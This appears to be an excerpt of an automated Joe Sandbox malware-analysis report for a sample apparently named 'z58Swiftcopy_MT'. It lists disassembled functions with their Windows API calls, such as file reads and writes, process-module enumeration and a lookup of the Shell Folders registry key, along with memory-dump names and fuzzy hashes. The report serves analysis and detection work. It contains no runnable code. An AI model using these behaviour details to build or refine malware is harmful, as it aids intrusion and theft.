                                                                                                                                                                                                                                      Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3154509469-0
                                                                                                                                                                                                                                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                                                                                                      Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                                                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                                                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                                                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4232544981-0
                                                                                                                                                                                                                                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                                                                                                      Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                                                                                                      Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressProc$FileModuleName
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3859505661-0
                                                                                                                                                                                                                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                                                                                                      Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileRead
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                                                                                                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                                                                                                      Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?,0041056A,00000000,004538EC,00000002,?,00412758,00000000,00000000,?), ref: 0040A325
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                                                                                                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                                                                                                      Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      • Opcode ID: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                                                                                                                                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d54aae614fa8c55dcd640132eb097a684c5c1cfdaa339356b04098da49b3b41
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                                                                                                      Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                                                                                                      Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0041052B,00000000,?,00412758,00000000,00000000,?,00000000,00000000), ref: 004096EE
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                                                                                                      Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??3@
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                                                                                                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                                                                                                      Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                                                                                                      Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: EnumNamesResource
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3334572018-0
                                                                                                                                                                                                                                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                                                                                                      Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                                                                                                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                                                                                                      Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                                                                                                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                                                                                                      Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Open
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 71445658-0
                                                                                                                                                                                                                                      • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                      • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                                                                                                                                                      Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                                                                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                                                                                                      Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
